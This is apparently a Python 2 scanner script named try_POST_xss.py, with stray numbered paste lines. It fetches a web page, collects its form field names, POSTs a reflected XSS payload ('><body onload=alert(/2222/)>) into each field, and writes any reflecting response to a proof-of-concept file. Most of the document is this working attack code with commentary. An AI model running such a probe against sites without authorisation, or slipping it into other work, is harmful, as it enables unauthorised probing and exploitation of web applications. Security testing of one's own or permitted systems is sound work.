
webscan module - xss-over-post

  1. #!/usr/bin/env python
  2.  
  3. # try_POST_xss.py
  4. #
  5. # first we GET http://argv[1]:80 + argv[2] and read the whole page
  6. # to find out what name="..." attributes (inputs/submits/etc.) it has.
  7. # next we POST each of those parameter names separately, with 'payload'.
  8.  
  9. # More @ http://hauntit.blogspot.com
  10. # enjoy.
  11.  
import httplib
import re
import socket
import sys
import urllib
import urllib2
  17.  
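# Usage: try_POST_xss.py <host[:port]> </path/to/page.php>
# This guard has to sit before the first sys.argv[] access: the usage
# message in the MAIN section further down is only reached after these
# reads, so a missing argument used to die with an IndexError instead.
if len(sys.argv) < 3:
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)

host = sys.argv[1]
path_file = sys.argv[2]
# httplib's request path must start with '/', otherwise the request line
# is malformed ("POST page.php HTTP/1.1").
if not path_file.startswith('/'):
    path_file = '/' + path_file
# Only append the default port when the caller did not give one;
# 'host:8080' used to become 'host:8080:80' and break HTTPConnection.
url = host if ':' in host else host + ':80'

url_file = url + path_file

# Reflected XSS probe: closes an attribute/tag, then a <body> whose onload
# fires alert(/2222/). do_post_now() decides "hit" by looking for this
# payload's marker in the response body, so keep the two in sync if you
# change the payload.
payload = '\'><body onload=alert(/2222/)>;]#/**'
# if you want I have version 'payloads-from-file' too.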
  26.  
# Banner: echo the parsed target back so a typo in argv is obvious
# before any request goes out. (Print-statement comma spacing is kept:
# 'Target:  host', 'Vuln file:  path', one space after the URL label.)
banner = [
    'Target:  %s' % host,
    'Vuln file:  %s' % path_file,
    'Full URL to attack: %s' % url_file,
    '',
]
for banner_line in banner:
    print(banner_line)
  31.  
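# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' ('to find') string.
# urllib2 is used instead of urllib so the request gets a timeout (urllib's
# urlopen has none and a stalled target hung the scan). A 4xx/5xx answer is
# still read -- the HTTPError object carries both the body and the code --
# which matches the old urllib behaviour of never raising on HTTP status.
try:
    get_connect = urllib2.urlopen('http://' + url_file, timeout=10)
except urllib2.HTTPError as err:
    get_connect = err
try:
    get_response = get_connect.read()
    status = get_connect.getcode()
finally:
    get_connect.close()  # the old code never released this handle

print('Status of requested page:  %s' % status)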
  39.  
  40.  
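# what we're looking for: the name= attribute of form controls only
# (input/textarea/select/button). The old pattern matched any ' name="..."',
# which also picked up <meta name=...> and similar non-form attributes and
# POSTed those too. Both quote styles and unquoted values are accepted,
# and duplicates (radio/checkbox groups) are collapsed so each field is
# tried exactly once.
_field_re = re.compile(
    r"<(?:input|textarea|select|button)\b[^>]*?\sname\s*=\s*['\"]?([^'\">\s]+)",
    re.IGNORECASE)
results = []
for _name in _field_re.findall(get_response):
    if _name not in results:
        results.append(_name)

#############################################################
# Proof-of-concept dump: do_post_now() appends each reflecting response
# body here. Opened once for the whole run and deliberately never closed
# (see the note inside do_post_now); the OS closes it at exit.
poc = open('poc_file_for_POST_xss.html','w')

#############################################################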
  48.  
  49. #############################################################
  50.  
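# func to send POST to target url+found parameter
def do_post_now(url, param=None, needle=None, timeout=10):
    """POST the XSS ``payload`` in one form field and check for a raw reflection.

    Args:
        url: "host:port" string handed straight to httplib.HTTPConnection
            (the script builds it as ``host + ':80'``).
        param: form field to inject into. Defaults to ``results[i]`` -- the
            list and cursor the MAIN loop below maintains -- so the original
            ``do_post_now(url)`` call keeps working.
        needle: substring whose presence in the response body counts as a
            hit. Defaults to the ``<body onload=alert(/2222/)>`` tag from
            ``payload`` (keep the two in sync). The old check looked for the
            bare digits ``'2222'``, which are also present when the server
            HTML-encodes the tag (``&lt;body onload=...``, i.e. the
            non-exploitable case) and whenever the page simply contains
            those digits. Pass ``'2222'`` to get the old, looser test.
        timeout: socket timeout in seconds (the original had none, so one
            stalled target hung the whole scan).

    Returns:
        True if ``needle`` occurs in the response body, False otherwise --
        also on transport errors, which are reported on stdout instead of
        killing the run.

    Side effects: prints the HTTP status line and any finding; on a hit the
    raw response body is appended to the module-level ``poc`` file.
    """
    if param is None:
        param = results[i]
    if needle is None:
        # The part that must come back unescaped for the injection to fire.
        # The quote/bracket prefix of the payload is left out on purpose: a
        # magic_quotes-style filter may mangle it without neutralising the tag.
        needle = '<body onload=alert(/2222/)>'

    params = urllib.urlencode({param: payload})
    headers = {'Content-type': 'application/x-www-form-urlencoded',
               'Accept': 'text/plain'}

    connect = httplib.HTTPConnection(url, timeout=timeout)
    try:
        connect.request('POST', path_file, params, headers)
        response = connect.getresponse()
        print('%s %s' % (response.status, response.reason))  # 200 OK?
        data = response.read()
    except (httplib.HTTPException, socket.error) as err:
        print('\t[-] POST to %s (param %s) failed: %s' % (url, param, err))
        return False
    finally:
        # always release the socket, hit or miss, error or not
        connect.close()

    offset = data.find(needle)
    if offset == -1:
        return False

    # Report the line number; the old message printed a byte offset and
    # called it a line.
    line_no = data.count('\n', 0, offset) + 1
    print('\t[+- (  POST XSS alert!  ) -+]')
    print('\t [+] Found POST XSS in line: %d (param %s)' % (line_no, param))
    # Keep the whole reflecting page as the PoC. write(), not writelines():
    # writelines() on a str only works because it iterates characters.
    # The file is shared across parameters, so it is flushed here and never
    # closed -- close() would make every later call fail with ValueError,
    # which is presumably the error the original comment warned about.
    poc.write(data)
    poc.flush()
    return True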
  72.    
  73. # end of do_post_now(url)
  74. # ---
  75.  
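# MAIN:
# Two positional arguments are required (host and path); the old '< 2'
# test let a missing path through. The sys.argv[] reads near the top of the
# file run before this point, so this guard is only a second line of defence.
if len(sys.argv) < 3:
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)
elif not results:
    # The old code ended silently here, which looked like a hang or a crash.
    print('No form field names found in ' + url_file + ' -- nothing to POST.')
else:
    print('-------------------------------------------------------------')
    print('Got some results :) Now we can try to exploit parameters.\n')

    # `i` must stay a module global: do_post_now() reads results[i] itself
    # rather than taking the parameter name as an argument.
    for i, name in enumerate(results):
        print('Found param called:  ' + name)
        print('Do POST now, for URL:  %s  with param:  %s' % (url, name))
        # one POST per found parameter; the other fields are not sent, so a
        # form that validates required fields may reject the request
        do_post_now(url)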
  98.     # end of while i loop